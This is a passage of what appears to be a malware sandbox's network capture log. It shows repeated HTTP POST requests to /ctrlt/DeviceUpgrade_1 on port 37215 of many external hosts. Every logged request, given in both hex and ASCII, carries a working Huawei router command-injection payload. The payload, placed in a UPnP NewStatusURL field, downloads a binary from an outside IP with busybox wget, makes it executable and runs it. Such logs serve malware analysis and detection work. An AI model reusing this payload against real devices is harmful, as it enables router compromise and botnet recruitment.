69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      36192.168.2.1439172156.71.176.21337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.565502882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.910087109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418200016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410018921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.394198895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425818920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361629963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      37192.168.2.1444588156.157.40.19637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.567389965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.914113045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418196917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410089016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 